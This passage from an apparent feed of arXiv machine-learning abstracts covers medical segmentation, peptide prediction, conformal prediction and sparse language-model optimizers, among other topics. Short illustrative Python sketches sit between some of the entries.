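    A toy 1-D illustration of a score-difference drift (our simplification with Gaussians, not the paper's full construction): the score of N(m, s^2) is -(x - m)/s^2, so the difference between target and source scores becomes a drift that pulls source samples toward the target distribution.

```python
# Move samples drawn from a source Gaussian toward a target Gaussian by
# following the score difference; both scores are analytic here.
import random

def score(x, mean, var):
    return -(x - mean) / var

random.seed(0)
m_src, m_tgt, var = -2.0, 3.0, 1.0
samples = [random.gauss(m_src, var ** 0.5) for _ in range(2000)]

eta = 0.1
for _ in range(200):
    # Track the evolving sample mean so the "source" score follows the samples.
    m_cur = sum(samples) / len(samples)
    samples = [x + eta * (score(x, m_tgt, var) - score(x, m_cur, var))
               for x in samples]

print(round(sum(samples) / len(samples), 1))  # 3.0: samples reached the target mean
```

    With equal variances the score difference reduces to a constant shift per step, which makes the convergence to the target mean easy to verify by hand.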
    Meta-Polyp: a baseline for efficient Polyp segmentation. (arXiv:2305.07848v3 [eess.IV] UPDATED)
    In recent years, polyp segmentation has gained significant importance, and many methods have been developed using CNN, Vision Transformer, and Transformer techniques to achieve competitive results. However, these methods often face difficulties when dealing with out-of-distribution datasets, missing boundaries, and small polyps. In 2022, Meta-Former was introduced as a new baseline for vision, which not only improved the performance of multi-task computer vision but also addressed the limitations of the Vision Transformer and CNN family backbones. To further enhance segmentation, we propose a fusion of Meta-Former with UNet, along with a Multi-scale Upsampling block with a level-up combination in the decoder stage to enhance texture; we also propose the Convformer block, based on the idea of the Meta-Former, to enhance the crucial information of local features. These blocks enable combining global information, such as the overall shape of the polyp, with local and boundary information, which is crucial for the decisions made in medical segmentation. Our proposed approach achieved competitive performance and obtained the state-of-the-art result on the CVC-300, Kvasir, and CVC-ColonDB datasets. Apart from Kvasir-SEG, the others are out-of-distribution datasets. The implementation can be found at: https://github.com/huyquoctrinh/MetaPolyp-CBMS2023.
    Efficient Prediction of Peptide Self-assembly through Sequential and Graphical Encoding. (arXiv:2307.09169v1 [q-bio.BM])
    In recent years, there has been an explosion of research on the application of deep learning to the prediction of various peptide properties, due to the significant development and market potential of peptides. Molecular dynamics has enabled the efficient collection of large peptide datasets, providing reliable training data for deep learning. However, the lack of systematic analysis of peptide encoding, which is essential for AI-assisted peptide-related tasks, makes it an urgent problem to solve in order to improve prediction accuracy. To address this issue, we first collect a high-quality, colossal simulation dataset of peptide self-assembly containing over 62,000 samples generated by coarse-grained molecular dynamics (CGMD). Then, we systematically investigate the effect of encoding peptides as amino-acid sequences and as molecular graphs, using state-of-the-art sequential (i.e., RNN, LSTM, and Transformer) and structural deep learning models (i.e., GCN, GAT, and GraphSAGE), on the accuracy of peptide self-assembly prediction, an essential physicochemical process prior to any peptide-related applications. Extensive benchmarking studies have proven Transformer to be the most powerful sequence-encoding-based deep learning model, pushing the limit of peptide self-assembly prediction to decapeptides. In summary, this work provides a comprehensive benchmark analysis of peptide encoding with advanced deep learning models, serving as a guide for a wide range of peptide-related predictions such as isoelectric points, hydration free energy, etc.
    Exploiting Field Dependencies for Learning on Categorical Data. (arXiv:2307.09321v1 [cs.LG])
    Traditional approaches for learning on categorical data underexploit the dependencies between columns (a.k.a. fields) in a dataset because they rely on an embedding of data points driven solely by the classification/regression loss. In contrast, we propose a novel method for learning on categorical data with the goal of exploiting dependencies between fields. Instead of modelling statistics of features globally (i.e., by the covariance matrix of features), we learn a global field dependency matrix that captures dependencies between fields, and then we refine the global field dependency matrix at the instance-wise level with different weights (so-called local dependency modelling) w.r.t. each field to improve the modelling of the field dependencies. Our algorithm exploits the meta-learning paradigm, i.e., the dependency matrices are refined in the inner loop of the meta-learning algorithm without the use of labels, whereas the outer loop intertwines the updates of the embedding matrix (the matrix performing the projection) and the global dependency matrix in a supervised fashion (with the use of labels). Our method is simple, yet it outperforms several state-of-the-art methods on six popular benchmark datasets. Detailed ablation studies provide additional insights into our method.
    Unsupervised Embedding Quality Evaluation. (arXiv:2305.16562v2 [cs.LG] UPDATED)
    Unsupervised learning has recently significantly gained in popularity, especially with deep learning-based approaches. Despite numerous successes and approaching supervised-level performance on a variety of academic benchmarks, it is still hard to train and evaluate SSL models in practice due to the unsupervised nature of the problem. Even with networks trained in a supervised fashion, it is often unclear whether they will perform well when transferred to another domain. Past works are generally limited to assessing the amount of information contained in embeddings, which is most relevant for self-supervised learning of deep neural networks. This work follows a different approach: can we quantify how easy it is to linearly separate the data in a stable way? We survey the literature and uncover three methods that could potentially be used for evaluating the quality of representations. We also introduce one novel method based on recent advances in understanding the high-dimensional geometric structure of self-supervised learning. We conduct extensive experiments and study the properties of these metrics and ones introduced in previous work. Our results suggest that while there is no free lunch, there are metrics that can robustly estimate embedding quality in an unsupervised way.
    End-to-End Neural Network Training for Hyperbox-Based Classification. (arXiv:2307.09269v1 [cs.LG])
    Hyperbox-based classification has been seen as a promising technique in which decisions on the data are represented as a series of orthogonal, multidimensional boxes (i.e., hyperboxes) that are often interpretable and human-readable. However, existing methods are no longer capable of efficiently handling the increasing volume of data many application domains face nowadays. We address this gap by proposing a novel, fully differentiable framework for hyperbox-based classification via neural networks. In contrast to previous work, our hyperbox models can be efficiently trained in an end-to-end fashion, which leads to significantly reduced training times and superior classification results.
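    A minimal sketch of what hyperbox-based classification means (independent of the paper's differentiable end-to-end framework, and with hypothetical 2-D boxes): each class is an axis-aligned box, and a point is assigned to the class whose box it falls in, or is closest to.

```python
# Score a point by how far it lies outside a box [lo, hi]^d; 0 means inside.

def hyperbox_score(x, lo, hi):
    return sum(max(l - xi, 0.0, xi - h) for xi, l, h in zip(x, lo, hi))

# Two hypothetical class boxes in 2-D.
boxes = {"A": ([0.0, 0.0], [1.0, 1.0]), "B": ([2.0, 2.0], [3.0, 3.0])}

def classify(x):
    return min(boxes, key=lambda c: hyperbox_score(x, *boxes[c]))

print(classify([0.5, 0.5]))  # A
print(classify([2.5, 2.9]))  # B
```

    The paper's contribution is making such box boundaries trainable by gradient descent; the hard min/max scoring above would be replaced by smooth surrogates in that setting.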
    A Cryogenic Memristive Neural Decoder for Fault-tolerant Quantum Error Correction. (arXiv:2307.09463v1 [quant-ph])
    Neural decoders for quantum error correction (QEC) rely on neural networks to classify syndromes extracted from error correction codes and find appropriate recovery operators to protect logical information against errors. Despite the good performance of neural decoders, important practical requirements remain to be achieved, such as minimizing the decoding time to meet typical rates of syndrome generation in repeated error correction schemes, and ensuring the scalability of the decoding approach as the code distance increases. Designing a dedicated integrated circuit to perform the decoding task in co-integration with a quantum processor appears necessary to reach these decoding time and scalability requirements, as routing signals in and out of a cryogenic environment to be processed externally leads to unnecessary delays and an eventual wiring bottleneck. In this work, we report the design and performance analysis of a neural decoder inference accelerator based on an in-memory computing (IMC) architecture, where crossbar arrays of resistive memory devices are employed to both store the synaptic weights of the decoder neural network and perform analog matrix-vector multiplications during inference. In proof-of-concept numerical experiments supported by experimental measurements, we investigate the impact of TiO$_\textrm{x}$-based memristive devices' non-idealities on decoding accuracy. Hardware-aware training methods are developed to mitigate the loss in accuracy, allowing the memristive neural decoders to achieve a pseudo-threshold of $9.23\times 10^{-4}$ for the distance-three surface code, whereas the equivalent digital neural decoder achieves a pseudo-threshold of $1.01\times 10^{-3}$. This work provides a pathway to scalable, fast, and low-power cryogenic IMC hardware for integrated QEC.
    Heat Demand Forecasting with Multi-Resolutional Representation of Heterogeneous Temporal Ensemble. (arXiv:2210.13108v2 [cs.LG] UPDATED)
    One of the primary challenges faced by utility companies is ensuring efficient supply with minimal greenhouse gas emissions. The advent of smart meters and smart grids provides an unprecedented advantage in realizing an optimised supply of thermal energy through proactive techniques such as load forecasting. In this paper, we propose a forecasting framework for heat demand based on neural networks where the time series are encoded as scalograms equipped with the capacity of embedding exogenous variables such as weather, and holiday/non-holiday. Subsequently, CNNs are utilized to predict the heat load multi-step ahead. Finally, the proposed framework is compared with other state-of-the-art methods, such as SARIMAX and LSTM. The quantitative results from retrospective experiments show that the proposed framework consistently outperforms the state-of-the-art baseline method with real-world data acquired from Denmark. A minimal mean error of 7.54% for MAPE and 417 kW for RMSE is achieved with the proposed framework in comparison to all other methods.
    MOCA: Self-supervised Representation Learning by Predicting Masked Online Codebook Assignments. (arXiv:2307.09361v1 [cs.CV])
    Self-supervised learning can be used for mitigating the greedy needs of Vision Transformer networks for very large fully-annotated datasets. Different classes of self-supervised learning offer representations with either good contextual reasoning properties, e.g., using masked image modeling strategies, or invariance to image perturbations, e.g., with contrastive methods. In this work, we propose a single-stage and standalone method, MOCA, which unifies both desired properties using novel mask-and-predict objectives defined with high-level features (instead of pixel-level details). Moreover, we show how to effectively employ both learning paradigms in a synergistic and computation-efficient way. Doing so, we achieve new state-of-the-art results on low-shot settings and strong experimental results in various evaluation protocols with a training that is at least 3 times faster than prior methods.
    Exploiting Noise as a Resource for Computation and Learning in Spiking Neural Networks. (arXiv:2305.16044v5 [cs.NE] UPDATED)
    Networks of spiking neurons underpin the extraordinary information-processing capabilities of the brain and have become pillar models in neuromorphic artificial intelligence. Despite extensive research on spiking neural networks (SNNs), most studies are established on deterministic models, overlooking the inherent non-deterministic, noisy nature of neural computations. This study introduces the noisy spiking neural network (NSNN) and the noise-driven learning rule (NDL) by incorporating noisy neuronal dynamics to exploit the computational advantages of noisy neural processing. NSNN provides a theoretical framework that yields scalable, flexible, and reliable computation. We demonstrate that NSNN leads to spiking neural models with competitive performance, greater robustness against challenging perturbations than deterministic SNNs, and better reproduction of probabilistic neural computation in neural coding. This study offers a powerful and easy-to-use tool for machine learning, neuromorphic intelligence practitioners, and computational neuroscience researchers.
    Towards Ordinal Data Science. (arXiv:2307.09477v1 [cs.AI])
    Order is one of the main instruments to measure the relationship between objects in (empirical) data. However, compared to methods that use numerical properties of objects, the number of ordinal methods developed is rather small. One reason for this is the limited availability of computational resources in the last century that would have been required for ordinal computations. Another reason -- particularly important for this line of research -- is that order-based methods are often seen as too mathematically rigorous for applying them to real-world data. In this paper, we will therefore discuss different means for measuring and 'calculating' with ordinal structures -- a specific class of directed graphs -- and show how to infer knowledge from them. Our aim is to establish Ordinal Data Science as a fundamentally new research agenda. Besides cross-fertilization with other cornerstone machine learning and knowledge representation methods, a broad range of disciplines will benefit from this endeavor, including psychology, sociology, economics, web science, knowledge engineering, and scientometrics.
    Smooth Attention for Deep Multiple Instance Learning: Application to CT Intracranial Hemorrhage Detection. (arXiv:2307.09457v1 [eess.IV])
    Multiple Instance Learning (MIL) has been widely applied to medical imaging diagnosis, where bag labels are known and instance labels inside bags are unknown. Traditional MIL assumes that instances in each bag are independent samples from a given distribution. However, instances are often spatially or sequentially ordered, and one would expect similar diagnostic importance for neighboring instances. To address this, in this study, we propose a smooth attention deep MIL (SA-DMIL) model. Smoothness is achieved by the introduction of first and second order constraints on the latent function encoding the attention paid to each instance in a bag. The method is applied to the detection of intracranial hemorrhage (ICH) on head CT scans. The results show that this novel SA-DMIL: (a) achieves better performance than the non-smooth attention MIL at both scan (bag) and slice (instance) levels; (b) learns spatial dependencies between slices; and (c) outperforms current state-of-the-art MIL methods on the same ICH test set.
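    A hedged sketch of the first-order smoothness constraint (our toy penalty, not the authors' model): attention weights over ordered CT slices are penalized for changing abruptly between neighbors, encoding the prior that adjacent slices carry similar diagnostic importance.

```python
# Penalize squared differences between consecutive attention weights;
# a spiky attention profile pays a much larger penalty than a smooth one.

def first_order_smoothness(attention):
    return sum((a - b) ** 2 for a, b in zip(attention, attention[1:]))

smooth = [0.0, 0.1, 0.3, 0.4, 0.2, 0.0]  # attention spread over neighboring slices
spiky = [0.0, 0.0, 1.0, 0.0, 0.0, 0.0]   # all attention on a single slice

print(first_order_smoothness(smooth) < first_order_smoothness(spiky))  # True
```

    A second-order version would penalize differences of these differences, discouraging sharp changes in slope as well as in level.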
    SLCA: Slow Learner with Classifier Alignment for Continual Learning on a Pre-trained Model. (arXiv:2303.05118v2 [cs.CV] UPDATED)
    The goal of continual learning is to improve the performance of recognition models in learning sequentially arrived data. Although most existing works are established on the premise of learning from scratch, growing efforts have been devoted to incorporating the benefits of pre-training. However, how to adaptively exploit the pre-trained knowledge for each incremental task while maintaining its generalizability remains an open question. In this work, we present an extensive analysis for continual learning on a pre-trained model (CLPM), and attribute the key challenge to a progressive overfitting problem. Observing that selectively reducing the learning rate can almost resolve this issue in the representation layer, we propose a simple but extremely effective approach named Slow Learner with Classifier Alignment (SLCA), which further improves the classification layer by modeling the class-wise distributions and aligning the classification layers in a post-hoc fashion. Across a variety of scenarios, our proposal provides substantial improvements for CLPM (e.g., up to 49.76%, 50.05%, 44.69% and 40.16% on Split CIFAR-100, Split ImageNet-R, Split CUB-200 and Split Cars-196, respectively), and thus outperforms state-of-the-art approaches by a large margin. Based on such a strong baseline, critical factors and promising directions are analyzed in-depth to facilitate subsequent research.
    Deep Riemannian Networks for EEG Decoding. (arXiv:2212.10426v5 [cs.LG] UPDATED)
    State-of-the-art performance in electroencephalography (EEG) decoding tasks is currently often achieved with either Deep-Learning (DL) or Riemannian-Geometry-based decoders (RBDs). Recently, there has been growing interest in Deep Riemannian Networks (DRNs), which could possibly combine the advantages of both previous classes of methods. However, there are still a range of topics where additional insight is needed to pave the way for a more widespread application of DRNs in EEG. These include architecture design questions such as network size and end-to-end ability. How these factors affect model performance has not been explored. Additionally, it is not clear how the data within these networks is transformed, and whether this would correlate with traditional EEG decoding. Our study aims to lay the groundwork on these topics through the analysis of DRNs for EEG with a wide range of hyperparameters. Networks were tested on two public EEG datasets and compared with state-of-the-art ConvNets. Here we propose the end-to-end EEG SPDNet (EE(G)-SPDNet), and we show that this wide, end-to-end DRN can outperform the ConvNets, and in doing so use physiologically plausible frequency regions. We also show that the end-to-end approach learns more complex filters than traditional band-pass filters targeting the classical alpha, beta, and gamma frequency bands of the EEG, and that performance can benefit from channel-specific filtering approaches. Additionally, architectural analysis revealed areas for further improvement due to the possible loss of Riemannian-specific information throughout the network. Our study thus shows how to design and train DRNs to infer task-related information from the raw EEG without the need for handcrafted filterbanks and highlights the potential of end-to-end DRNs such as EE(G)-SPDNet for high-performance EEG decoding.
    Scaling Laws for Imitation Learning in NetHack. (arXiv:2307.09423v1 [cs.LG])
    Imitation Learning (IL) is one of the most widely used methods in machine learning. Yet, while powerful, many works find it is often not able to fully recover the underlying expert behavior. However, none of these works deeply investigate the role of scaling up the model and data size. Inspired by recent work in Natural Language Processing (NLP) where "scaling up" has resulted in increasingly more capable LLMs, we investigate whether carefully scaling up model and data size can bring similar improvements in the imitation learning setting. To demonstrate our findings, we focus on the game of NetHack, a challenging environment featuring procedural generation, stochasticity, long-term dependencies, and partial observability. We find IL loss and mean return scale smoothly with the compute budget and are strongly correlated, resulting in power laws for training compute-optimal IL agents with respect to model size and number of samples. We forecast and train several NetHack agents with IL and find they outperform prior state-of-the-art by at least 2x in all settings. Our work both demonstrates the scaling behavior of imitation learning in a challenging domain, as well as the viability of scaling up current approaches for increasingly capable agents in NetHack, a game that remains elusively hard for current AI systems.
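    The power laws mentioned above have the form L = a * C^(-b) for compute C; such a law can be recovered from (compute, loss) pairs by linear regression in log-log space. The data below is synthetic (not NetHack results), generated from known coefficients to show the fit recovers them:

```python
# Fit log L = log a - b log C by ordinary least squares; return (a, b).
import math

def fit_power_law(compute, loss):
    xs = [math.log(c) for c in compute]
    ys = [math.log(l) for l in loss]
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    slope = sum((x - mx) * (y - my) for x, y in zip(xs, ys)) / \
            sum((x - mx) ** 2 for x in xs)
    return math.exp(my - slope * mx), -slope

compute = [1e3, 1e4, 1e5, 1e6]
loss = [2.0 * c ** -0.3 for c in compute]  # generated with a = 2.0, b = 0.3
a, b = fit_power_law(compute, loss)
print(round(a, 2), round(b, 2))  # 2.0 0.3
```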
    Detecting Throat Cancer from Speech Signals Using Machine Learning: A Reproducible Literature Review. (arXiv:2307.09230v1 [cs.LG])
    In this work we perform a scoping review of the current literature on the detection of throat cancer from speech recordings using machine learning and artificial intelligence. We find 22 papers within this area and discuss their methods and results. We split these papers into two groups - nine performing binary classification, and 13 performing multi-class classification. The papers present a range of methods, with neural networks being most commonly implemented. Many features are also extracted from the audio before classification, with the most common being mel-frequency cepstral coefficients. None of the papers found in this search have associated code repositories and, as such, are not reproducible. Therefore, we create a publicly available code repository of our own classifiers. We use transfer learning on a multi-class problem, classifying three pathologies and healthy controls. Using this technique we achieve an unweighted average recall of 53.54%, sensitivity of 83.14%, and specificity of 64.00%. We compare our classifiers with the results obtained on the same dataset and find similar results.
    PAC Neural Prediction Set Learning to Quantify the Uncertainty of Generative Language Models. (arXiv:2307.09254v1 [cs.LG])
    Uncertainty learning and quantification of models are crucial tasks to enhance the trustworthiness of the models. Importantly, the recent surge of generative language models (GLMs) emphasizes the need for reliable uncertainty quantification due to concerns about generating hallucinated facts. In this paper, we propose to learn neural prediction set models that come with a probably approximately correct (PAC) guarantee for quantifying the uncertainty of GLMs. Unlike existing prediction set models, which are parameterized by a scalar value, we propose to parameterize prediction sets via neural networks, which achieves more precise uncertainty quantification but still satisfies the PAC guarantee. We demonstrate the efficacy of our method on four types of language datasets and six types of models by showing that our method improves the quantified uncertainty by $63\%$ on average, compared to a standard baseline method.
    SparseOptimizer: Sparsify Language Models through Moreau-Yosida Regularization and Accelerate via Compiler Co-design. (arXiv:2306.15656v3 [cs.LG] UPDATED)
    This paper introduces SparseOptimizer, a novel deep learning optimizer that exploits Moreau-Yosida regularization to naturally induce sparsity in large language models such as BERT, ALBERT and GPT. Key to the design of SparseOptimizer is an embedded shrinkage operator, which imparts sparsity directly within the optimization process. This operator, backed by a sound theoretical framework, includes an analytical solution, thereby reinforcing the optimizer's robustness and efficacy. Crucially, SparseOptimizer's plug-and-play functionality eradicates the need for code modifications, making it a universally adaptable tool for a wide array of large language models. Empirical evaluations on benchmark datasets such as GLUE, RACE, SQuAD1, and SQuAD2 confirm that SparseBERT and SparseALBERT, when sparsified using SparseOptimizer, achieve performance comparable to their dense counterparts, BERT and ALBERT, while significantly reducing their parameter count. Further, this work proposes an innovative optimizer-compiler co-design strategy, demonstrating the potential of inference acceleration (\textbf{3.37x}, \textbf{6.30x}, and \textbf{7.15x} in comparison with PyTorch, TensorFlow, and generic LLVM compilation, respectively) in SparseBERT when paired with an appropriately designed compiler. This study represents a significant step forward in the evolution of efficient, scalable, and high-performing large language models, setting a precedent for future exploration and optimization in this domain. The SparseOptimizer code and SparseALBERT model will be publicly available upon paper acceptance.
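    The classical analytical shrinkage operator that Moreau-Yosida regularization of the l1 norm yields in closed form is soft thresholding; the sketch below shows that operator on its own, not SparseOptimizer's actual update rule:

```python
# prox_{lam * |.|}(w): shrink each weight toward zero and zero out small ones,
# which is how a shrinkage step induces sparsity during optimization.

def soft_threshold(w, lam):
    if w > lam:
        return w - lam
    if w < -lam:
        return w + lam
    return 0.0

weights = [0.8, -0.05, 0.02, -1.2, 0.003]
print([round(soft_threshold(w, 0.1), 2) for w in weights])  # [0.7, 0.0, 0.0, -1.1, 0.0]
```

    Applied after each gradient step, such an operator drives small weights exactly to zero while only mildly shrinking large ones, which is the mechanism behind the induced sparsity.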
    Multi-Objective GFlowNets. (arXiv:2210.12765v2 [cs.LG] UPDATED)
    We study the problem of generating diverse candidates in the context of Multi-Objective Optimization. In many applications of machine learning such as drug discovery and material design, the goal is to generate candidates which simultaneously optimize a set of potentially conflicting objectives. Moreover, these objectives are often imperfect evaluations of some underlying property of interest, making it important to generate diverse candidates to have multiple options for expensive downstream evaluations. We propose Multi-Objective GFlowNets (MOGFNs), a novel method for generating diverse Pareto optimal solutions, based on GFlowNets. We introduce two variants of MOGFNs: MOGFN-PC, which models a family of independent sub-problems defined by a scalarization function, with reward-conditional GFlowNets, and MOGFN-AL, which solves a sequence of sub-problems defined by an acquisition function in an active learning loop. Our experiments on a wide variety of synthetic and benchmark tasks demonstrate the advantages of the proposed methods in terms of the Pareto performance and, importantly, improved candidate diversity, which is the main contribution of this work.
    Do DL models and training environments have an impact on energy consumption?. (arXiv:2307.05520v2 [cs.LG] UPDATED)
    Current research in the computer vision field mainly focuses on improving Deep Learning (DL) correctness and inference time performance. However, there is still little work on the huge carbon footprint that training DL models has. This study aims to analyze the impact of the model architecture and training environment when training greener computer vision models. We divide this goal into two research questions. First, we analyze the effects of model architecture on achieving greener models while keeping correctness at optimal levels. Second, we study the influence of the training environment on producing greener models. To investigate these relationships, we collect multiple metrics related to energy efficiency and model correctness during the models' training. Then, we outline the trade-offs between the measured energy efficiency and the models' correctness regarding model architecture, and their relationship with the training environment. We conduct this research in the context of a computer vision system for image classification. In conclusion, we show that selecting the proper model architecture and training environment can reduce energy consumption dramatically (up to 98.83%) at the cost of negligible decreases in correctness. Also, we find evidence that GPUs should scale with the models' computational complexity for better energy efficiency.
    Fusing Hand and Body Skeletons for Human Action Recognition in Assembly. (arXiv:2307.09238v1 [cs.CV])
    As collaborative robots (cobots) continue to gain popularity in industrial manufacturing, effective human-robot collaboration becomes crucial. Cobots should be able to recognize human actions to assist with assembly tasks and act autonomously. To achieve this, skeleton-based approaches are often used due to their ability to generalize across various people and environments. Although body skeleton approaches are widely used for action recognition, they may not be accurate enough for assembly actions where the worker's fingers and hands play a significant role. To address this limitation, we propose a method in which less detailed body skeletons are combined with highly detailed hand skeletons. We investigate CNNs and transformers, the latter of which are particularly adept at extracting and combining important information from both skeleton types using attention. This paper demonstrates the effectiveness of our proposed approach in enhancing action recognition in assembly scenarios.
    Revisiting the Robustness of the Minimum Error Entropy Criterion: A Transfer Learning Case Study. (arXiv:2307.08572v2 [cs.LG] UPDATED)
Coping with distributional shifts is an important part of transfer learning methods in order to perform well in real-life tasks. However, most of the existing approaches in this area either focus on an ideal scenario in which the data does not contain noise or employ a complicated training paradigm or model design to deal with distributional shifts. In this paper, we revisit the robustness of the minimum error entropy (MEE) criterion, a widely used objective in statistical signal processing for dealing with non-Gaussian noise, and investigate its feasibility and usefulness in real-life transfer learning regression tasks, where distributional shifts are common. Specifically, we put forward a new theoretical result showing the robustness of MEE against covariate shift. We also show that by simply replacing the mean squared error (MSE) loss with the MEE on basic transfer learning algorithms such as fine-tuning and linear probing, we can achieve competitive performance with respect to state-of-the-art transfer learning algorithms. We justify our arguments on both synthetic data and five real-world time-series datasets.
    Edit at your own risk: evaluating the robustness of edited models to distribution shifts. (arXiv:2303.00046v2 [cs.LG] UPDATED)
    The current trend toward ever-larger models makes standard retraining procedures an ever-more expensive burden. For this reason, there is growing interest in model editing, which enables computationally inexpensive, interpretable, post-hoc model modifications. While many model editing techniques are promising, research on the properties of edited models is largely limited to evaluation of validation accuracy. The robustness of edited models is an important and yet mostly unexplored topic. In this paper, we employ recently developed techniques from the field of deep learning robustness to investigate both how model editing affects the general robustness of a model, as well as the robustness of the specific behavior targeted by the edit. We find that edits tend to reduce general robustness, but that the degree of degradation depends on the editing algorithm and layers chosen. Motivated by these observations we introduce a new model editing algorithm, 1-layer interpolation (1-LI), which uses weight-space interpolation to navigate the trade-off between editing task accuracy and general robustness.
    Conformal prediction under ambiguous ground truth. (arXiv:2307.09302v1 [cs.LG])
In safety-critical classification tasks, conformal prediction allows one to perform rigorous uncertainty quantification by providing confidence sets that include the true class with a user-specified probability. This generally assumes the availability of a held-out calibration set with access to ground truth labels. Unfortunately, in many domains, such labels are difficult to obtain and usually approximated by aggregating expert opinions. In fact, this holds true for almost all datasets, including well-known ones such as CIFAR and ImageNet. Applying conformal prediction using such labels underestimates uncertainty. Indeed, when expert opinions are not resolvable, there is inherent ambiguity present in the labels. That is, we do not have ``crisp'', definitive ground truth labels, and this uncertainty should be taken into account during calibration. In this paper, we develop a conformal prediction framework for such ambiguous ground truth settings which relies on an approximation of the underlying posterior distribution of labels given inputs. We demonstrate our methodology on synthetic and real datasets, including a case study of skin condition classification in dermatology.
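For context, the standard split conformal procedure that this framework generalizes can be sketched in a few lines. The sketch below assumes crisp calibration labels, which is exactly the assumption the ambiguous-ground-truth setting relaxes; the nonconformity score 1 - p is an illustrative choice:

```python
import math

def conformal_threshold(cal_scores, alpha):
    """Split conformal: the finite-sample-corrected (1 - alpha) quantile of
    the calibration nonconformity scores."""
    n = len(cal_scores)
    rank = math.ceil((n + 1) * (1 - alpha))   # rank into the sorted scores
    return sorted(cal_scores)[min(rank, n) - 1]

def prediction_set(probs, threshold):
    """Include every class whose nonconformity score (1 - p) is at most the
    threshold; under exchangeability the set covers the true class with
    probability at least 1 - alpha."""
    return {k for k, p in enumerate(probs) if 1.0 - p <= threshold}

# Calibration scores 1 - p_true for nine held-out examples, alpha = 0.2:
cal = [0.1, 0.2, 0.3, 0.15, 0.05, 0.25, 0.4, 0.35, 0.12]
q = conformal_threshold(cal, alpha=0.2)
sets = prediction_set([0.7, 0.2, 0.1], q)
```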
    Multimodal LLMs for health grounded in individual-specific data. (arXiv:2307.09018v1 [q-bio.QM])
Foundation large language models (LLMs) have shown an impressive ability to solve tasks across a wide range of fields including health. To effectively solve personalized health tasks, LLMs need the ability to ingest a diversity of data modalities that are relevant to an individual's health status. In this paper, we take a step towards creating multimodal LLMs for health that are grounded in individual-specific data by developing a framework (HeLM: Health Large Language Model for Multimodal Understanding) that enables LLMs to use high-dimensional clinical modalities to estimate underlying disease risk. HeLM encodes complex data modalities by learning an encoder that maps them into the LLM's token embedding space, and handles simple modalities like tabular data by serializing them into text. Using data from the UK Biobank, we show that HeLM can effectively use demographic and clinical features in addition to high-dimensional time-series data to estimate disease risk. For example, HeLM achieves an AUROC of 0.75 for asthma prediction when combining tabular and spirogram data modalities compared with 0.49 when only using tabular data. Overall, we find that HeLM outperforms or performs at parity with classical machine learning approaches across a selection of eight binary traits. Furthermore, we investigate the downstream uses of this model such as its generalizability to out-of-distribution traits and its ability to power conversations around individual health and wellness.
    A Unifying Framework for Differentially Private Sums under Continual Observation. (arXiv:2307.08970v1 [cs.LG])
    We study the problem of maintaining a differentially private decaying sum under continual observation. We give a unifying framework and an efficient algorithm for this problem for \emph{any sufficiently smooth} function. Our algorithm is the first differentially private algorithm that does not have a multiplicative error for polynomially-decaying weights. Our algorithm improves on all prior works on differentially private decaying sums under continual observation and recovers exactly the additive error for the special case of continual counting from Henzinger et al. (SODA 2023) as a corollary. Our algorithm is a variant of the factorization mechanism whose error depends on the $\gamma_2$ and $\gamma_F$ norm of the underlying matrix. We give a constructive proof for an almost exact upper bound on the $\gamma_2$ and $\gamma_F$ norm and an almost tight lower bound on the $\gamma_2$ norm for a large class of lower-triangular matrices. This is the first non-trivial lower bound for lower-triangular matrices whose non-zero entries are not all the same. It includes matrices for all continual decaying sums problems, resulting in an upper bound on the additive error of any differentially private decaying sums algorithm under continual observation. We also explore some implications of our result in discrepancy theory and operator algebra. Given the importance of the $\gamma_2$ norm in computer science and the extensive work in mathematics, we believe our result will have further applications.
    Nested Elimination: A Simple Algorithm for Best-Item Identification from Choice-Based Feedback. (arXiv:2307.09295v1 [cs.LG])
    We study the problem of best-item identification from choice-based feedback. In this problem, a company sequentially and adaptively shows display sets to a population of customers and collects their choices. The objective is to identify the most preferred item with the least number of samples and at a high confidence level. We propose an elimination-based algorithm, namely Nested Elimination (NE), which is inspired by the nested structure implied by the information-theoretic lower bound. NE is simple in structure, easy to implement, and has a strong theoretical guarantee for sample complexity. Specifically, NE utilizes an innovative elimination criterion and circumvents the need to solve any complex combinatorial optimization problem. We provide an instance-specific and non-asymptotic bound on the expected sample complexity of NE. We also show NE achieves high-order worst-case asymptotic optimality. Finally, numerical experiments from both synthetic and real data corroborate our theoretical findings.
    Towards Dynamic Causal Discovery with Rare Events: A Nonparametric Conditional Independence Test. (arXiv:2211.16596v5 [stat.ML] UPDATED)
Causal phenomena associated with rare events occur across a wide range of engineering problems, such as risk-sensitive safety analysis, accident analysis and prevention, and extreme value theory. However, current methods for causal discovery are often unable to uncover causal links between random variables in a dynamic setting that manifest only when the variables first experience low-probability realizations. To address this issue, we introduce a novel statistical independence test on data collected from time-invariant dynamical systems in which rare but consequential events occur. In particular, we exploit the time-invariance of the underlying data to construct a superimposed dataset of the system state before rare events happen at different timesteps. We then design a conditional independence test on the reorganized data. We provide non-asymptotic sample complexity bounds for the consistency of our method, and validate its performance across various simulated and real-world datasets, including incident data collected from the Caltrans Performance Measurement System (PeMS). Code containing the datasets and experiments is publicly available.
    Robust Counterfactual Explanations for Neural Networks With Probabilistic Guarantees. (arXiv:2305.11997v2 [stat.ML] UPDATED)
There is an emerging interest in generating robust counterfactual explanations that would remain valid if the model is updated or changed even slightly. Towards finding robust counterfactuals, existing literature often assumes that the original model $m$ and the new model $M$ are bounded in the parameter space, i.e., $\|\text{Params}(M){-}\text{Params}(m)\|{<}\Delta$. However, models can often change significantly in the parameter space with little to no change in their predictions or accuracy on the given dataset. In this work, we introduce a mathematical abstraction termed \emph{naturally-occurring} model change, which allows for arbitrary changes in the parameter space such that the change in predictions on points that lie on the data manifold is limited. Next, we propose a measure -- that we call \emph{Stability} -- to quantify the robustness of counterfactuals to potential model changes for differentiable models, e.g., neural networks. Our main contribution is to show that counterfactuals with a sufficiently high value of \emph{Stability} as defined by our measure will remain valid after potential ``naturally-occurring'' model changes with high probability (leveraging concentration bounds for Lipschitz functions of independent Gaussians). Since our quantification depends on the local Lipschitz constant around a data point, which is not always available, we also examine practical relaxations of our proposed measure and demonstrate experimentally how they can be incorporated to find robust counterfactuals for neural networks that are close, realistic, and remain valid after potential model changes. This work also has interesting connections with model multiplicity, also known as the Rashomon effect.
    Data Cross-Segmentation for Improved Generalization in Reinforcement Learning Based Algorithmic Trading. (arXiv:2307.09377v1 [cs.LG])
